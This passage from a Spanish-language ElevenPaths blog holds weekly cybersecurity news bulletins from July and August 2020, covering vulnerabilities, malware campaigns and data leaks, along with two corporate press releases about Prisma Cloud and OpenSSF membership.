omitir las funciones de seguridad que evitan que se carguen archivos firmados incorrectamente. Además de los dos 0-day activamente explotados, cabe destacar una de las vulnerabilidades críticas. En concreto se trata de la CVE-2020-1472, una vulnerabilidad de elevación de privilegios en el componente NetLogon. Algunos investigadores de seguridad refuerzan la necesidad de parchear esta vulnerabilidad, para la cual se producirá un cambio en el servicio el próximo mes de febrero de 2021. Más información: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Aug Adobe repara fallos de ejecución de código en Adobe Acrobat, Reader y Lightroom Adobe ha lanzado actualizaciones de seguridad para abordar 26 vulnerabilidades de las cuales 11 son clasificadas como críticas debido a que podrían permitir a los atacantes eludir las funciones de seguridad o realizar la ejecución remota de código en equipos vulnerables. Adobe Acrobat y Reader: Se han corregido 25 vulnerabilidades de las cuales 11 son críticas ya que podrían permitir la ejecución remota de código o eludir las funciones de seguridad. Adobe Lightroom: Se ha resuelto una vulnerabilidad de escala de privilegios, derivada de que el programa carga de forma insegura una DLL al iniciarse y podría permitir a un atacante ejecutar una DLL maliciosa en su lugar. Todos los detalles aquí: https://www.bleepingcomputer.com/news/security/adobe-fixes-critical-code-execution-bugs-in-acrobat-and-reader/ Evolución del malware Mekotio El equipo de investigadores de ESET ha realizado una publicación informando acerca del desarrollo del troyano bancario Mekotio; software malicioso empleado fundamentalmente contra varios países de LATAM como Brasil, Chile o México y Europa como España y Portugal. Entre sus capacidades destaca la de recopilar información confidencial de los hosts de las víctimas, configuraciones de firewall, información del sistema operativo, privilegios del usuario y el estado de las herramientas de seguridad instaladas. Asimismo, Mekotio dispone de varias funciones, entre las que destaca la capacidad de funcionar como backdoor, realizar capturas de pantalla, manipular ventanas emergentes o simular acciones del ratón y del teclado. Algunas variantes también pueden robar bitcoins reemplazando una billetera bitcoin en el portapapeles o exfiltrar credenciales almacenadas en Google Chrome. Su distribución se realiza mediante campañas de malspam, en las que se solicita a la víctima descargar un archivo que simula ser una factura. La comunicación con el servidor C&C se basa en un protocolo de red en Delphi_Remote_Access_PC. Cuando esta no es posible, utiliza una base de datos SQL que funciona como una especie de servidor C&C en las que llama a procedimientos SQL específicos almacenados en el lado del servidor y que son cifrados. ESET indica que existen en desarrollo múltiples variantes de este malware, por lo que se estima que a futuro seguirá infectando a nuevas víctimas. Más información: https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
14 de agosto de 2020
ElevenPaths amplía su cartera de soluciones de seguridad en la nube con Prisma Cloud de Palo Alto Networks
La compañía de ciberseguridad de Telefónica Tech ha alcanzado el estatus de Socio Premier Public Cloud MSSP de Palo Alto Networks ElevenPaths, la compañía de ciberseguridad de Telefónica Tech, ha ampliado sus servicios de seguridad gestionada en la nube (Cloud MSS) incorporando a su oferta la tecnología Prisma Cloud™ de Palo Alto Networks®, que abarca los entornos de nube públicas como AWS®, Azure® y GCP™, cuyos servicios también se prestan a través de la unidad Cloud de Telefónica Tech. Cloud MSS proporciona a los clientes un servicio completo de seguridad nativa en la nube para una adopción y experiencia más segura, ofreciendo a los equipos de seguridad una visibilidad y protección de activos en tiempo real, un control continuo del nivel de protección y una respuesta ante las incidencias. Como Socio Prisma Cloud (Prisma MSSP) con competencia técnica y experiencia demostradas, ElevenPaths es un socio natural de seguridad en la nube que gestiona y garantiza el éxito en la implantación de Cloud MSS basada en Prisma Cloud, y que protege las cargas de trabajo y los datos de los clientes en AWS, Azure y GCP. Prisma Cloud de Palo Alto Networks es una plataforma completa de seguridad nativa en la nube (CNSP) que ofrece a las empresas la cobertura de seguridad y el cumplimiento que necesitan en toda su cartera de tecnologías en la nube, aplicaciones y datos. Garantiza la agilidad, la eficacia y acelera el desarrollo de las operaciones de seguridad y de los equipos de DevOps, así como el desarrollo y la implantación de aplicaciones nativas en la nube de forma segura. ElevenPaths Cloud MSS y su equipo cualificado de seguridad en la nube i-SOC de Europa y América Latina aprovecha Prisma Cloud para ofrecer herramientas punteras de protección, detección y respuesta para sus clientes allá donde estén. El servicio evalúa los entornos de nubes de los clientes en tiempo real en relación con los conjuntos de reglas adaptados para ellos, basados en las plantillas de reglas de seguridad incorporadas de Prisma Cloud y en el conjunto de reglas patentado por ElevenPaths, para identificar los posibles riesgos y prevenir los posibles problemas de seguridad. El seguimiento continuo de los incidentes de seguridad es supervisado por una serie de operaciones dirigidas que evalúan continuamente el nivel general de seguridad en la nube y que dan respuesta tanto a las amenazas como a los incidentes de seguridad. Prisma Cloud forma parte del servicio principal y ofrece seguridad nativa constante en la nube y gestión del cumplimiento para entornos de nubes múltiples. El paradigma de la nube hace surgir nuevos desafíos de seguridad a lo largo de su proceso de implantación: establecer un sistema de seguridad integral para mantener el nivel de seguridad adecuado en un entorno tremendamente cambiante o ser capaz de incluir la seguridad en el pipeline de DevOps para ofrecer una infraestructura y una carga de trabajo seguras. La oferta de seguridad en la nube de ElevenPaths incluye servicios y herramientas profesionales y gestionadas para ayudar a los clientes a superar esos retos. Cloud MSS concentra sus esfuerzos en las operaciones y en la respuesta a las amenazas desconocidas para ayudar a los clientes a implantar un sistema de seguridad en la nube efectivo, escalable y controlable. “Como no se puede asegurar lo que no se ve, la prevención y la detección de riesgos se convierte en un reto”, afirma Alberto Sempere, director de producto y comercialización de ElevenPaths. “Con el MSS Cloud de ElevenPaths impulsado por Prisma Cloud, los equipos informáticos y de seguridad de nuestros clientes pueden pasar menos tiempo probando y evaluando su entorno y más tiempo evolucionando su negocio. Este servicio ayuda a los clientes a evaluar, comprender y automatizar mejor su posición en cuanto a la seguridad en la nube.” En opinión de Alex Zinin, VP Worldwide Service Provider Business, Palo Alto Networks, “las organizaciones están recurriendo cada vez más a los MSSP para hacer frente al complejo entorno actual de amenazas a las nubes públicas, a la escasez de talento técnico y a las dinámicas condiciones empresariales, todo ello manteniendo los costes de seguridad bajo control. Estamos orgullosos de trabajar con ElevenPaths tanto en EMEA como en Latinoamérica para llevar el poder de Prisma Cloud a organizaciones y empresas de todo el mundo, ayudando a que cada día sea más seguro que el anterior.” Nota de prensa completa
12 de agosto de 2020
Noticias de Ciberseguridad: Boletín semanal 1-7 de agosto
Base de datos de más de 900 servidores empresariales Pulse Secure VPN Se ha detectado una publicación en foros underground que muestra la existencia de una base de datos con información recopilada sobre más de 900 servidores empresariales Pulse Secure VPN. El medio digital zdnet.com ha conseguido obtener y analizar la información, entre la que se incluyen: direcciones IP de los servidores Pulse Secure VPN, versión del firmware y claves ssh de los servidores, lista de usuarios y hashes de contraseñas, entre otros. La información parece haberse obtenido entre el 24 de junio y el 8 de julio de 2020. Desde la cuenta de Twitter de Bank Security afirman que, tras analizar la información obtenida, todos los servidores Pulse Secure VPN incluidos en la lista ejecutaban una versión de firmware vulnerable a la vulnerabilidad CVE-2019-11510. Debido a ello, se estima que el agente amenaza que ha recopilado esta información podría haber utilizado un exploit para dicha vulnerabilidad y, una vez obtenido acceso a estos sistemas, ha extraído la información para crear este repositorio. Más información: https://www.zdnet.com/article/hacker-leaks-passwords-for-900-enterprise-vpn-servers/ Ejecución remota de código en Microsoft Teams El investigador Reegun Jayapaul de Trustwave ha publicado un análisis sobre Microsoft Teams en el que afirma que la aplicación sería vulnerable a ataques de ejecución remota de código. El incremento del uso de las aplicaciones de videoconferencia como ayuda en el teletrabajo durante la crisis sanitaria, ha derivado en que los agentes amenaza hayan puesto foco en este tipo de herramientas, y en este sentido, Microsoft Teams ha sido uno de los recursos más utilizados. En 2019, este software publicó un parche que eliminaba la posibilidad de que un atacante pudiera usar el volumen de actualizaciones del software para incluir cargas maliciosas, dada la capacidad de actualizar a través de una URL. Sin embargo, tal como resalta el investigador, esta no era una solución completa puesto que se permiten conexiones locales a través de un recurso compartido. La prueba de concepto para demostrar este hecho pasa por utilizar un recurso compartido remoto de SMB, creando un servidor Samba con acceso remoto público y nombrando la carga maliciosa como Squirrel, gestor de instalación y actualizaciones de Teams. Para la mitigación de esta amenaza, se recomienda analizar ejecutables con el nombre de Squirrel.exe e investigar las posibles conexiones salientes de SMB. Noticia completa: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/ Nueva vulnerabilidad en TeamViewer El investigador de seguridad Jeffrey Hofmann ha descubierto una nueva vulnerabilidad en la plataforma TeamViewer de Windows codificada con CVE-2020-13699 y con un CVSS v3 de 8.8. Esta herramienta es utilizada para la conexión en remoto tanto a equipos informáticos como a dispositivos móviles. La vulnerabilidad descubierta implica que versiones vulnerables de TeamViewer no ejecutan correctamente los controladores URI, lo que podría llevar a agentes amenaza explotar este fallo mediante la inclusión de un iframe malicioso en un dominio web creado con fines para realizar un ataque. La explotación de esta vulnerabilidad se puede iniciar de forma remota y no requiere autenticación previa, por lo que se considera susceptible de sufrir ataques denominados como “watering hole”. Hasta el momento, no hay indicios de que esta vulnerabilidad esté siendo explotada, ni tampoco que se encuentre disponible ningún exploit. Desde la compañía han lanzado una nueva actualización, que recomiendan aplicar (15.8.3) para corregir este fallo de seguridad que afecta a versiones previas de TeamViewer. Todos los detalles en: https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/m-p/99129 Nuevas técnicas de ataques de temporización Un grupo de investigadores ha descubierto una nueva técnica para los ataques de canal lateral basados en temporización que los hace más efectivos. Un ataque de este tipo se basa principalmente en las variaciones de tiempo de transmisión de la red, lo cual depende de la congestión de esta. La nueva técnica, llamada TTA (Timeless Timing Attacks) hace uso de la multiplexación que ofrecen los protocolos de red y la ejecución concurrente de las aplicaciones para analizar el orden de respuestas y dejan de depender de la sincronización, y por lo tanto, de los tiempos de transmisión de la red. Esto se permite solamente en aquellos protocolos con HTTP/2, incluidos los servicios web que admiten HTTPS. Adicionalmente, los investigadores afirman que este nuevo método podría ser implementado contra servicios de Tor, usándose esta técnica también en servicios web con HTTP/1.1, permitiendo a un agente amenaza crear dos conexiones a un nodo de esta red y enviar solicitudes simultáneas desde ambas para medir la diferencia de tiempo. Más información: https://thehackernews.com/2020/07/http2-timing-side-channel-attacks.html Expuestos 20GB de documentos internos de Intel La compañía tecnológica Intel se encuentra investigando una brecha de seguridad, después de que un total de 20GB de documentos internos fueran expuestos en MEGA. La compañía ha confirmado la autenticidad de los documentos, algunos catalogados como “restringidos” o “confidenciales”, si bien cabe destacar que entre estos no se encuentran datos confidenciales de clientes o empleados. El responsable del robo envió estos archivos a Till Kottmann, responsable de un canal de Telegram que publica datos filtrados accidentalmente de empresas tecnológicas, quien subió a MEGA una parte de estos archivos. Por el momento Intel sospecha que el robo se produjo por una persona con acceso a su Centro de Recursos y Diseño, donde proporcionan documentos técnicos no públicos a sus socios comerciales, y no de un acceso no autorizado. Si bien, el responsable del robo afirmó a Till Kottmann que estos datos fueron obtenidos mediante el acceso a un servidor no seguro alojado en el CDN de Akamai. Toda la información en: https://www.zdnet.com/google-amp/article/intel-investigating-breach-after-20gb-of-internal-documents-leak-online/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
7 de agosto de 2020
ElevenPaths se une a la OpenSSF para mejorar la seguridad del software open source
Esta nueva Fundación para la Seguridad del Código Abierto (OpenSSF) reúne a las empresas líderes en tecnología como Microsoft, Google, Red Hat e IBM, entre otros Combina los esfuerzos de Core Infrastructure Initiative, GitHub’s Open Source Security Coalition y otros proyectos de seguridad de código abierto de los miembros fundadores del consejo de administración de GitHub, Google, IBM, JPMorgan Chase, Microsoft, NCC Group, la Fundación OWASP y Red Hat ElevenPaths se une como Additional Founding Member a esta nueva Fundación La Organización Linux ha anunciado la creación de la Fundación para la Seguridad del Código Abierto (OpenSSF). La OpenSSF es una colaboración entre industrias que reúne a las empresas líderes en tecnología con vistas a mejorar la seguridad del software de código abierto (OSS) mediante la consolidación de una comunidad más amplia, con iniciativas específicas y mejores prácticas. Combina los esfuerzos de Core Infrastructure Initiative, GitHub’s Open Source Security Coalition y otros proyectos de seguridad de código abierto de los miembros fundadores del consejo de administración de GitHub, Google, IBM, JPMorgan Chase, Microsoft, NCC Group, la Fundación OWASP y Red Hat, entre otros. Otros miembros fundadores son ElevenPaths, GitLab, HackerOne, Intel, Okta, Purdue, SAFECode, StackHawk, Trail of Bits, Uber y VMware. ElevenPaths, la compañía de ciberseguridad de Telefónica, se une como miembro fundador, donde Rames Sarwat, Chief Revenue Officer de ElevenPaths, declaró que "la seguridad de una aplicación o servicios corporativos depende principalmente de la seguridad de todos sus componentes. La gran mayoría de las aplicaciones y servicios empresariales no se desarrollan en su totalidad dentro de la empresa, ya que utilizan componentes de código abierto que ayudan a acelerar el ciclo de desarrollo y ampliar su funcionalidad. Por lo tanto, es esencial garantizar que todos los componentes de código abierto cumplen con las mejores prácticas de desarrollo seguro y que se llevan a cabo revisiones periódicas para lograr un impacto positivo en todo el software que hace uso de estos componentes. La adhesión a la Fundación para la Seguridad del Código Abierto (OpenSSF) se ajusta completamente a nuestra visión y principios". El software de código abierto se ha convertido en algo omnipresente en los centros de datos, así como en los dispositivos y servicios de consumo, lo que muestra su valor entre los tecnólogos y las empresas. Debido a su proceso de desarrollo, el código abierto que llega en última instancia al usuario final tiene una cadena de contribuyentes y dependencias. Por ello, es importante que los responsables de la seguridad de su usuario u organización sean capaces de comprender y verificar la seguridad de esta cadena de dependencia. El OpenSSF reúne las iniciativas de seguridad de código abierto más importantes de la industria, así como las personas y empresas que las apoyan. La Core Infrastructure Initiative (CII) de la Fundación Linux, creada en respuesta al fallo Heartbleed de 2014, y la Open Source Security Coalition, fundada por el Laboratorio de Seguridad de GitHub, son solo dos de los proyectos que se reunirán bajo la nueva OpenSSF. El gobierno de la Fundación, la comunidad técnica y sus decisiones serán transparentes, y cualquier especificación y proyecto desarrollado serán independientes de los proveedores. La OpenSSF está comprometida con la colaboración y el trabajo tanto en la fase inicial como con las comunidades existentes para avanzar en la seguridad del código abierto para todos. Jim Zemlin, director ejecutivo de la Fundación Linux afirmó que "creemos que el código abierto es un bien público y a través de cada industria tenemos la responsabilidad de unirnos para mejorar y apoyar la seguridad del software de código abierto del que todos dependemos. Garantizar la seguridad del código abierto es uno de los pasos más importantes que podemos dar, y requiere que todos nosotros, en todo el mundo, colaboremos en el proyecto. La OpenSSF proporcionará ese foro para un verdadero esfuerzo de colaboración entre industrias". Con la formalización del grupo, se establece la estructura de gobernanza abierta que incluye un Consejo de Administración, un Consejo Consultivo Técnico y una supervisión independiente para cada grupo de trabajo y proyecto. La OpenSSF pretende acoger diversas iniciativas técnicas de código abierto para apoyar la seguridad del software de código abierto más importante del mundo, y todo ello se hará públicamente en GitHub. Para obtener más información y contribuir al proyecto, se puede visitar https://openssf.org. Declaraciones de los Governing Board Member "La seguridad es siempre lo primero para Google y nuestros usuarios. Hemos desarrollado herramientas y sistemas de seguridad interna de carácter sólido que permiten consumir software de código abierto de manera interna, para nuestros usuarios y para nuestros productos basados en OSS. Creemos en la capacidad de crear productos más seguros y con un profundo impacto para todos, y nos entusiasma trabajar con la comunidad en general a través de la OpenSSF. Esperamos poder compartir nuestra innovación y trabajar juntos para mejorar la seguridad del software de código abierto del que todos dependemos", declaró el Director de Seguridad de Productos de Google Cloud, James Higgins. "El código abierto se ha convertido en la norma de la empresa. Como tal, la seguridad de la cadena de suministro de código abierto es de suma importancia para IBM y nuestros clientes", citó Christopher Ferris, miembro de IBM y CTO de Tecnología Abierta. "El lanzamiento de la Fundación para la Seguridad del Código Abierto (OpenSSF) constituye un paso importante a la hora de proporcionar a las comunidades de código abierto la información y las herramientas que necesitan para mejorar sus prácticas de ingeniería segura, así como la información que los desarrolladores necesitan para acertar a la hora de elegir el código abierto". "Como el código abierto es ahora el centro de casi todas las estrategias tecnológicas de las empresas, garantizar la seguridad del software de código abierto es esencial para asegurar la cadena de suministro de todas las empresas, incluida la nuestra", dijo Mark Russinovich, Director de Tecnología de Microsoft Azure. "Como con todo lo relativo al código abierto, reforzar la seguridad es un proceso que ha de llevar a cabo la comunidad. En Microsoft estamos muy contentos de ser miembro fundador de la Fundación para la Seguridad del Código Abierto (OpenSSF) y esperamos asociarnos con la comunidad para crear nuevas soluciones de seguridad que nos ayuden a todos". Nota de prensa completa
5 de agosto de 2020
Noticias de Ciberseguridad: Boletín semanal 25-31 de julio
BootHole: vulnerabilidad en GRUB2 Investigadores de Eclypsium han descubierto una vulnerabilidad de desbordamiento de búfer en el gestor de arranque GRUB2 que podría utilizarse para ejecutar código arbitrario durante el proceso de arranque y a la que han denominado BootHole. Este fallo de seguridad, catalogado como CVE-2020-10713 y que ha recibido una criticidad alta con un CVSS de 8.2, afectaría tanto a sistemas Linux como Windows, y podría permitir a los atacantes instalar gestores de arranque maliciosos para darles un control casi total sobre el dispositivo vulnerable. Eclypsium advierte que mitigar esta amenaza requerirá del lanzamiento de nuevos instaladores y cargadores de arranque para todas las versiones de Linux y Windows. Por su parte, algunas compañías como Microsoft han publicado un aviso de seguridad sobre este problema. Todos los detalles: https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/ Doki: nuevo malware dirigido a servidores Docker Investigadores de Intezer han descubierto una nueva puerta trasera para servidores Docker que se ejecutan en Linux a la que han denominado Doki y que además implementa una técnica hasta ahora desconocida. Este malware aprovecha un método no documentado para contactar con su operador al abusar de la cadena de bloques de criptomonedas Dogecoin de una manera particular. De esta forma, Doki logra generar direcciones de dominio del Command & Control de forma dinámica. Doki ha conseguido mantenerse oculto durante más de 6 meses a pesar de que las muestras estuviesen disponibles públicamente en VirusTotal. Más información: https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ Emotet evoluciona en el envío de correos Se ha descubierto que el malware Emotet estaría robando los archivos adjuntos para dotar de autenticidad los correos electrónicos que usa en sus campañas. Se trata de la primera vez en que este software malicioso utiliza esta técnica, dado que no existía antes el módulo de robo de archivos adjuntos en el código del malware, el cual se agregó alrededor del 13 de junio, según afirma Marcus 'MalwareTech' Hutchins. Desde su descubrimiento por primera vez en 2014 como un troyano bancario, Emotet ha evolucionado para ser hoy una red de bots maliciosos usada por agentes amenaza para la infección con diferentes familias de malware. Tras 5 meses de inactividad, ha vuelto a la carga con campañas de correo masivas camufladas bajo supuestos informes de pago, facturas o información de envíos, comprometiendo víctimas con el troyano TrickBot o, más recientemente, con el malware QakBot. Para saber más: https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/ Alertas sobre ciberataques y vulnerabilidades industriales La Agencia de Seguridad Nacional (NSA) de EE.UU ha advertido, junto a la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA), sobre la posibilidad de inminentes ciberataques contra el sector industrial. Se trata de una tendencia que viene marcada por el ataque TRITON del año 2017 y que podría dar lugar a ataques similares afectando a los Sistemas Instrumentados de Seguridad (SIS), la última línea de defensa de los sistemas OT. Por su parte, el ICS-CERT ha emitido un aviso sobre varias vulnerabilidades en Triconex SIS de Schneider, de las que se destaca el error más crítico, catalogado como CVE-2020-7491 con un CVSS v3 de 10. Este corresponde con fallo de control de acceso inadecuado que permitiría un acceso no autorizado y una posible toma de control por parte de un agente amenaza. Schneider Electric ya corrigió estos problemas en las últimas versiones de sus productos TriStation y Tricon Communications Module (TCM). Sin embargo, el ICS-CERT quiere hacer hincapié en las características de los dispositivos OT, que no suelen ser actualizados ni dotados de unos estándares de seguridad al nivel de los ataques actuales. Toda la info: https://us-cert.cisa.gov/ncas/alerts/aa20-205a Se subasta el código fuente del troyano Cerberus El equipo de desarrollo del troyano Cerberus se ha separado y el código fuente del malware se subastará, según ha publicado dicho equipo en un foro clandestino ruso. Se trata de un troyano con afectación principal a Android, que lleva en circulación desde 2019 y que estaría generando unos 10.000 dólares mensuales en ganancias, según informa uno de los gestores de Cerberus. Tras infectar un dispositivo, el troyano actúa creando superposiciones en los servicios creados por aplicaciones bancarias, robando credenciales y exfiltrando estos datos a los servidores de Command & Control (C2). Incluso se han dado casos que demuestran su capacidad de interceptar mecanismos de autenticación multi-factor (MFA). El anuncio realizado por el agente amenaza indica que esperan generar hasta 100.000 dólares con esta venta, ofreciendo la posibilidad del paquete entero, incluyendo el malware .apk y servidores de C2, al mejor postor. Más detalles: https://www.zdnet.com/article/cerberus-banking-trojan-team-breaks-up-source-code-goes-to-auction/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
31 de julio de 2020
Noticias de Ciberseguridad: Boletín semanal 18-24 de julio
Nueva campaña de Emotet tras cinco meses Tras meses de inactividad, Emotet ha reaparecido con el envío masivo de correos electrónicos de cadena de respuestas y el pago de facturas, entre otros, que incluyen adjuntos documentos Word maliciosos, dirigidos a usuarios en todo el mundo. El investigador Joseph Roosen declaró que la botnet de Emotet estaría distribuyendo cantidades masivas de spam, los cuales incluyen documentos maliciosos con URLs actualizadas, normalmente de sitios de WordPress vulnerados. Una vez que la víctima se infecta, el malware desplegaría más módulos que permitirían el robo del correo de la víctima, la propagación a otros equipos o el uso del equipo infectado para enviar spam. Más detalles: https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/ Incidente de ransomware contra Blackbaud La compañía Blackbaud, proveedora de software y de almacenamiento en la nube, ha comunicado que ha sido víctima de un incidente de ransomware aún sin identificar. Según la empresa, el pasado mes de mayo agentes amenaza realizaron una intrusión en su red interna con el objetivo de desplegar un ransomware en ella. A raíz de estos hechos, el equipo de seguridad logró evitar el cifrado de los archivos pertenecientes a Blackbaud expulsando de la red a dichos actores maliciosos. Sin embargo, antes de repeler el ataque, los cibercriminales consiguieron robar la información de un pequeño subconjunto de clientes, los cuales han sido ya notificados. Consecuentemente, estos atacantes han amenazado ya con publicar la información sustraída a menos que se pague un rescate por los archivos. Desde la compañía han asegurado que cumplirán con estas demandas y que pagarán por la eliminación de dichos datos. Este incidente se suma a la tendencia actual de doble extorsión que caracteriza a este tipo de ataques en la que no solo se cifra la información, sino que se roba y se exige un pago tanto para descifrarla como para no hacer pública la documentación. Toda la información: https://www.blackbaud.com/securityincident Exploit para vulnerabilidad RCE en SharePoint El investigador de seguridad Steven Seeley ha publicado los detalles de cómo se puede aprovechar la vulnerabilidad crítica CVE-2020-1147 en SharePoint para obtener la capacidad de ejecutar código de forma remota como un usuario con pocos privilegios. En este caso, Seeley ha demostrado como, haciendo uso de objetos de tipo DataSet, se puede lograr la ejecución de código al aprovecharse del método "LosFormatter.Deserialize". Para ello, habría que crear un payload en base64. Una vez hecho esto, se podría añadir este payload a un DataSet específico y conseguir de este modo la ejecución remota de código en el servidor SharePoint víctima. Esta táctica podría ser utilizada contra otras aplicaciones .NET, por lo que aunque no se disponga de servidores SharePoint instalados, el usuario podría verse afectado de todos modos. Más: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html Campañas de phishing alojadas en servicios en la nube El equipo de investigadores de CheckPoint ha realizado una publicación en la que advierten sobre la utilización de servicios en la nube como Google Cloud o Microsoft Azure, para realizar campañas de phishing. En enero de 2020, los investigadores detectaron un documento PDF en Google Drive en el que se facilitaba un enlace a un phishing alojado en los servidores de Google. En este incidente, los agentes amenaza suplantaron una página de inicio de sesión a SharePoint en el que se solicitaba credenciales de usuario o corporativas con el fin de exfiltrar dicha información. Durante todas estas etapas, los usuarios no sospechan ninguna actividad maliciosa, debido a que la página de phishing está alojada en Google Cloud Storage y aparece el protocolo de cifrado HTTPS. Una forma de identificar estos engaños era visualizar el código fuente de la página de phishing, debido a que podría identificarse que la mayoría de los recursos se cargaban desde un sitio web que pertenece a los actores maliciosos. Sin embargo, ataques más recientes revelan que agentes amenaza han comenzado a utilizar Google Cloud Functions, un servicio que permite la ejecución de código en la nube, lo que permite ofuscar los dominios maliciosos de los atacantes. Más información: https://blog.checkpoint.com/2020/07/21/how-scammers-are-hiding-their-phishing-trips-in-public-clouds/ Botnet Emotet difunde malware QakBot El investigador de seguridad Cryptolaemus, ha informado que, tras volver a la actividad recientemente, Emotet ha comenzado a distribuir el malware QakBot. Esta campaña utilizaría como vector de entrada el uso de correos electrónicos para la distribución de dicho malware ofuscado en documentos maliciosos. Cabe destacar que en los últimos días el equipo de MalwareBytes alertó sobre una nueva campaña de Emotet tras cinco meses de inactividad, a la cual tradicionalmente se ha ligado la distribución de otra herramienta maliciosa denominada Trickbot. Sin embargo, este nuevo hallazgo podría evidenciar que habría una nueva tendencia con la distribución de Qakbot, ya que desde Cryptolaemus aseguran haber observado la ausencia de TrickBot en los ataques de Emotet más recientes. Asimismo, los investigadores indicaron que existen antecedentes en cuanto al cambio en la distribución de software malicioso, aunque no ocurre con frecuencia. Uno de estos cambios ya se observó el año pasado, por lo que se considera probable que a futuro se vuelva a utilizar Trickbot y reanuden su tradicional metodología de ataques. Todos los detalles: https://twitter.com/Cryptolaemus1/status/1285579090234400769 Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
24 de julio de 2020
Noticias de Ciberseguridad: Boletín semanal 11-17 de julio
Combinación de vulnerabilidades en Citrix para obtener sesiones de usuario El día 7 de julio, Citrix publicó un boletín donde corregía un total de 11 vulnerabilidades y pocos días después se publicó una explicación detallada de estas junto a una prueba de concepto. El 11 de julio, se ha publicado cómo combinar tres de ellas (CVE-2020-8193, CVE-2020-8195 y CVE-2020-8196) para poder obtener las sesiones de los usuarios actualmente autenticados. Según los investigadores de NCC Group, estas vulnerabilidades estarían siendo explotadas activamente. Los atacantes aprovecharían en primer lugar una vulnerabilidad de evasión de autorización (CVE-2020-8193) para después, empleando las vulnerabilidades CVE-2020-8195 o CVE-2020-8196, extraer del dispositivos las sesiones VPN de los usuarios. Además, se han observado también intentos de extraer otros elementos de información del dispositivo. Para que el sistema sea vulnerable, el atacante debe tener acceso a la interfaz NSIP del dispositivo. Si esta interfaz no estuviera expuesta en Internet, el riesgo de explotación sería bajo. Más detalles: https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/ SAP corrige una vulnerabilidad crítica Se ha publicado la corrección de una vulnerabilidad crítica que afectaría a más de 40.000 clientes relacionada con las versiones desde la 7.30 hasta la 7.50 de SAP NetWeaver AS JAVA. El fallo en este asistente de configuración ha sido catalogado con el identificador CVE-2020-6287 con un CVSS de 10. Un agente amenaza no autenticado podría explotar este error a través del protocolo HTTP para tomar el control de aplicaciones SAP, debido a una carencia de autenticación en un componente web del software vulnerable. La severidad de esta vulnerabilidad es crítica dado que las aplicaciones afectadas suelen estar expuestas a internet. Se recomienda encarecidamente a los usuarios SAP que actualicen con la mayor brevedad posible los productos afectados y aplicar el parche publicado. Toda la info: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 Anchor_DNS: puerta trasera para Linux En las últimas horas se ha conocido que los desarrolladores del malware TrickBot habrían sido responsables también del reciente desarrollo de una versión de la puerta trasera Anchor_DNS para sistemas Linux. Una de las principales características de esta nueva herramienta para la comunicación mediante DNS con el servidor Command & Control es que, al ejecutarse, se instala como un Cron Job y pasa a comprobar la IP pública del equipo infectado mediante peticiones a URLs externas. Una vez realizado esto, comienza a transmitir información a través de consultas DNS al servidor C2 controlado por los atacantes. Esta versión para Linux también soportaría la ejecución en Windows mediante SMB e IPC. Más información: https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30 Vulnerabilidad crítica en Windows DNS Server Se ha publicado en el Patch Tuesday de Microsoft la corrección de una vulnerabilidad catalogada con el identificador CVE-2020-1350 y un CVSS v3 de 10 que afecta a las versiones de Windows Server 2003 a 2019. Se trata de un fallo crítico en Windows DNS Server, cuyo aprovechamiento podría permitir a un agente amenaza la ejecución remota de código en aquellos entornos de dominio de Windows, especialmente controladores de dominio, sin parches aplicados. Debido a una incorrecta gestión de las peticiones, se da lugar a la posible ejecución de código arbitrario en el contexto de la cuenta de Local System. Se recomienda encarecidamente la actualización urgente según indicaciones del fabricante. Noticia completa: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350 Adobe corrige 13 vulnerabilidades Adobe ha lanzado actualizaciones de software para corregir un total de 13 nuevas vulnerabilidades de seguridad que afectarían a cinco de sus aplicaciones más utilizadas: Adobe Creative Cloud Desktop Application, Adobe Media Encoder, Adobe Genuine Service, Adobe ColdFusion, Adobe Download Manager. De estas 13 vulnerabilidades, cuatro han sido calificadas como críticas y nueve son importantes. Ninguna de las vulnerabilidades de seguridad corregidas en este lote de actualizaciones de Adobe ha sido divulgada públicamente o se ha encontrado previamente explotada. Las versiones 5.1 y anteriores de Adobe Creative Cloud Desktop Application para sistemas operativos Windows contienen cuatro vulnerabilidades, una de las cuales es un problema crítico de enlaces simbólicos (CVE-2020-9682) que conduce a ataques de escritura en sistemas de archivos arbitrarios. Adobe Media Encoder contiene dos problemas críticos de ejecución de código arbitrario (CVE-2020-9650 y 